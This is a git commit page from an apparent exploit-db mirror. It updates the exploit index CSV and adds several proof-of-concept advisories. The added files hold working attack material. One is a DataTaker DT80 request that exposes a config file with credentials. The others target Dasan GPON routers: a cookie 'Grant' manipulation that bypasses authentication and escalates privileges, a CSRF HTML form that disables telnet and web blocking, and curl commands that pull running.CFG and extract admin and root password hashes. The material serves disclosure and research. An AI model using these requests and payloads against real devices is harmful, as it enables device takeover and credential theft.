bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-07-14

Browse source 
6 new exploits

Novell Groupwise 6.5.3 Client - Local Integer Overflow
Novell Groupwise Client 6.5.3 - Local Integer Overflow

SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities
SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities

Novell Client 4.91 SP4 - Privilege Escalation
Novell Client 4.91 SP4 - Local Privilege Escalation

Novell Client 4.91 SP4 - nwfs.sys Privilege Escalation (Metasploit)
Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)

Novell Client 2 SP3 - Privilege Escalation
Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation

Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation

Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)

Novell iPrint Client Browser Plugin - call-back-url Stack Overflow
Novell iPrint Client Browser Plugin - 'call-back-url' Stack Overflow

Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)
Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)

Skype for Business 2016 - Cross-Site Scripting

DataTaker DT80 dEX 1.50.012 - Information Disclosure
Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass
Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery
Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation
Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download
This commit is contained in:
Offensive Security 2017-07-14 05:01:24 +00:00
parent e796424f76
commit 2f83b6c1be
8 changed files with 533 additions and 18 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

28
files.csv
View file

@ -3423,7 +3423,7 @@ id,file,description,date,author,platform,type,port
26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos,0
26251,platforms/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos,0
26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0
26301,platforms/windows/dos/26301.txt,"Novell Groupwise 6.5.3 Client - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0
26301,platforms/windows/dos/26301.txt,"Novell Groupwise Client 6.5.3 - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0
26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
26322,platforms/windows/dos/26322.pl,"MusicBee 2.0.4663 - '.m3u' Denial of Service",2013-06-19,Chako,windows,dos,0
26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
@ -3979,7 +3979,7 @@ id,file,description,date,author,platform,type,port
31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
31563,platforms/windows/dos/31563.txt,"SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos,0
31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0
31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0
@ -7198,7 +7198,7 @@ id,file,description,date,author,platform,type,port
18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,windows,local,0
18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
@ -8248,7 +8248,7 @@ id,file,description,date,author,platform,type,port
26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0
26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0
26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0
26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0
26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0
26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0
26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0
@ -8280,7 +8280,7 @@ id,file,description,date,author,platform,type,port
27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0
27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu - '-c' Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0
27168,platforms/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Privilege Escalation / Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local,0
27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - Privilege Escalation",2013-07-29,sickness,windows,local,0
27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation",2013-07-29,sickness,windows,local,0
27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0
27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0
27285,platforms/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local,0
@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
@ -9357,7 +9357,7 @@ id,file,description,date,author,platform,type,port
627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143
636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80
637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25
638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110
638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110
640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0
644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110
@ -10734,7 +10734,7 @@ id,file,description,date,author,platform,type,port
14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80
14976,platforms/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0
15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0
15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0
15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - 'call-back-url' Stack Overflow",2010-09-19,Abysssec,windows,remote,0
15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar - Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0
@ -10955,7 +10955,7 @@ id,file,description,date,author,platform,type,port
16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@ -13530,8 +13530,8 @@ id,file,description,date,author,platform,type,port
24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0
24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110
646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0
643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110
646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0
24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
@ -15623,6 +15623,7 @@ id,file,description,date,author,platform,type,port
41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@ -38127,4 +38128,9 @@ id,file,description,date,author,platform,type,port
42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0
42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0
42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0
42313,platforms/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps,0
42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0
42320,platforms/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps,0
42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0

Can't render this file because it is too large.

62
platforms/hardware/webapps/42313.txt Executable file
View file

@ -0,0 +1,62 @@
[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-11165
Vendor:
===============
http://www.datataker.com/
About:
========
The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.
The dataTaker DT80s Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.
Vulnerability Type:
===================
Sensitive Configurations Exposure.
issue:
===================
dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via
a direct request for the /services/getFile.cmd?userfile=config.xml URI.
POC:
===================
http://victim/services/getFile.cmd?userfile=config.xml
Output:
========
<config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">
<environment>
<application version="1.50.012" build="2014-01-07, 15:16:53"/>
<flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>
<operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>
<screen resolution="1024x768"/>
</environment>
etc....
<loggerSetting category="PPP" profile="USER">username</loggerSetting>
<loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>
<loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>
<loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>
<loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>
<loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>

57
platforms/hardware/webapps/42320.txt Executable file
View file

@ -0,0 +1,57 @@
Dasan Networks GPON ONT WiFi Router H64X Series Authentication Bypass
Vendor: Dasan Networks
Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu
Affected version: Model: H640GR-02
H640GV-03
H640GW-02
H640RW-02
H645G
Firmware: 2.76-9999
2.76-1101
2.67-1070
2.45-1045
Summary: H64xx is comprised of one G-PON uplink port and four ports
of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It
helps service providers to extend their core optical network all the
way to their subscribers, eliminating bandwidth bottlenecks in the
last mile. H64xx is integrated device that provide the high quality
Internet, telephony service (VoIP) and IPTV or OTT content for home
or office. H64xx enable the subscribers to make a phone call whose
quality is equal to PSTN at competitive price, and enjoy the high
quality resolution live video and service such as VoD or High Speed
Internet.
Desc: The vulnerable device does not properly perform authentication
and authorization, allowing it to be bypassed through cookie manipulation.
Setting the Cookie 'Grant' with value 1 (user) or 2 (admin) will
bypass security controls in place enabling the attacker to take full
control of the device management interface.
Tested on: Server: lighttpd/1.4.31
Server: DasanNetwork Solution
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5421
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5421.php
19.05.2017
--
GET /cgi-bin/sysinfo.cgi HTTP/1.1
Host: 192.168.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Bond-James-Bond/007
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: Grant=1; Language=english; silverheader=3c
Connection: close

85
platforms/hardware/webapps/42321.txt Executable file
View file

@ -0,0 +1,85 @@
Dasan Networks GPON ONT WiFi Router H64X Series Cross-Site Request Forgery
Vendor: Dasan Networks
Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu
Affected version: Model: H640GR-02
H640GV-03
H640GW-02
H640RW-02
H645G
Firmware: 3.03p1-1145
3.03-1144-01
3.02p2-1141
2.77p1-1125
2.77-1115
2.76-9999
2.76-1101
2.67-1070
2.45-1045
Summary: H64xx is comprised of one G-PON uplink port and four ports
of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It
helps service providers to extend their core optical network all the
way to their subscribers, eliminating bandwidth bottlenecks in the
last mile. H64xx is integrated device that provide the high quality
Internet, telephony service (VoIP) and IPTV or OTT content for home
or office. H64xx enable the subscribers to make a phone call whose
quality is equal to PSTN at competitive price, and enjoy the high
quality resolution live video and service such as VoD or High Speed
Internet.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain, if not all actions
with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: Server: lighttpd/1.4.31
Server: DasanNetwork Solution
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5422
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5422.php
19.05.2017
--
Enable telnet access (disable telnet blocking):
Enable web access (disable web blocking):
-----------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.0.1:8080/cgi-bin/remote_mgmt_action.cgi" method="POST">
<input type="hidden" name="rdoIPhost2TelnetBlocking" value="0" />
<input type="hidden" name="rdoIPhost2WebBlocking" value="0" />
<input type="hidden" name="waiting&#95;action" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Increase session timeout (0: disable, min: 1, max: 60):
-------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.0.1:8080/cgi-bin/websetting_action.cgi" method="POST">
<input type="hidden" name="sessionTimeout" value="60" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

60
platforms/hardware/webapps/42322.txt Executable file
View file

@ -0,0 +1,60 @@
Dasan Networks GPON ONT WiFi Router H64X Series Privilege Escalation
Vendor: Dasan Networks
Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu
Affected version: Model: H640GR-02
H640GV-03
H640GW-02
H640RW-02
H645G
Firmware: 2.77-1115
2.76-9999
2.76-1101
2.67-1070
2.45-1045
Summary: H64xx is comprised of one G-PON uplink port and four ports
of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It
helps service providers to extend their core optical network all the
way to their subscribers, eliminating bandwidth bottlenecks in the
last mile. H64xx is integrated device that provide the high quality
Internet, telephony service (VoIP) and IPTV or OTT content for home
or office. H64xx enable the subscribers to make a phone call whose
quality is equal to PSTN at competitive price, and enjoy the high
quality resolution live video and service such as VoD or High Speed
Internet.
Desc: The application suffers from a privilege escalation vulnerability.
A normal user can elevate his/her privileges by changing the Cookie 'Grant'
from 1 (user) to 2 (admin) gaining administrative privileges and revealing
additional functionalities or additional advanced menu settings.
Tested on: Server: lighttpd/1.4.31
Server: DasanNetwork Solution
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5423
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5423.php
19.05.2017
--
Change cookie Grant=1 (user) to Grant=2 (admin):
------------------------------------------------
GET /cgi-bin/index.cgi HTTP/1.1
Host: 192.168.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Bond-James-Bond/007
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,mk;q=0.6
Cookie: Grant=2; Language=macedonian; silverheader=3c
Connection: close

140
platforms/hardware/webapps/42323.txt Executable file
View file

@ -0,0 +1,140 @@
Dasan Networks GPON ONT WiFi Router H64X Series System Config Download
Vendor: Dasan Networks
Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu
Affected version: Models: H640GR-02
H640GV-03
H640GW-02
H640RW-02
H645G
Firmware: 3.02p2-1141
2.77p1-1125
2.77-1115
2.76-9999
2.76-1101
2.67-1070
2.45-1045
Versions 3.03x are not affected by this issue.
The running.CFG/wifi.CFG backup files are now 7z password protected.
Summary: H64xx is comprised of one G-PON uplink port and four ports
of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It
helps service providers to extend their core optical network all the
way to their subscribers, eliminating bandwidth bottlenecks in the
last mile. H64xx is integrated device that provide the high quality
Internet, telephony service (VoIP) and IPTV or OTT content for home
or office. H64xx enable the subscribers to make a phone call whose
quality is equal to PSTN at competitive price, and enjoy the high
quality resolution live video and service such as VoD or High Speed
Internet.
Desc: The system backup configuration file 'running.CFG' and the wireless
backup configuration file 'wifi.CFG' can be downloaded by an attacker
from the root directory in certain circumstances. This will enable the
attacker to disclose sensitive information and help her in authentication
bypass, privilege escalation and/or full system access.
Tested on: Server: lighttpd/1.4.31
Server: DasanNetwork Solution
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5424
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5424.php
19.05.2017
--
-------------------
#1 This PoC request is assuming that the admin or a user created a backup. This is done by first issuing a request
to: /cgi-bin/backuprecoversystembackup_action.cgi or /cgi-bin/backuprecoverwifibackup_action.cgi scripts that
instructs the web server to generate the running.CFG or wifi.CFG gziped files respectively.
curl http://192.168.0.1/running.CFG -# | gunzip > dasan_output.txt ; strings dasan_output.txt | grep -rn 'admin:'
######################################################################## 100.0%
(standard input):180:admin:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:admin:/etc:/bin/sh
(standard input):1442:admin:admin123:2
bash-4.4$ curl http://192.168.0.1/running.CFG -# | gunzip > dasan_output.txt ; strings dasan_output.txt | grep -rn 'root:'
######################################################################## 100.0%
(standard input):181:root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:root:/etc:/bin/sh
(standard input):191:root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:14987:0:99999:7:::
bash-4.4$
Notice the same hard-coded shell credentials for admin and root user.
Left for the viewer to exercise 'cracking the perimeter'. ;]
-------------------
#2 This PoC request will do an authentication bypass using the Grant cookie to create the running.CFG file.
In this request we're using Grant=1 with the account 'user' which by default has the password: user. After that,
decompressing the file, navigating to 'etc' extracted directory and reading 'web_user' file which can then
escalate privileges by reading the admin password and loggin-in.
bash-4.4$ curl http://192.168.0.1/cgi-bin/backuprecoversystembackup_action.cgi --cookie "silverheader=0c; Grant=1; Language=english" -H "X-Requested-With: XMLHttpRequest" ; sleep 5
bash-4.4$ curl http://192.168.0.1/running.CFG -vv --cookie "silverheader=0c; Grant=1; Language=english" -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.0.1...
* TCP_NODELAY set
* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0)
> GET /running.CFG HTTP/1.1
> Host: 192.168.0.1
> User-Agent: curl/7.51.0
> Accept: */*
> Cookie: silverheader=0c; Grant=1; Language=english
>
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< ETag: "2477069903"
< Last-Modified: Wed, 12 Jul 2017 19:14:18 GMT
< Content-Length: 10467
< Date: Thu, 13 Jul 2017 00:56:14 GMT
< Server: lighttpd/1.4.31
<
{ [1208 bytes data]
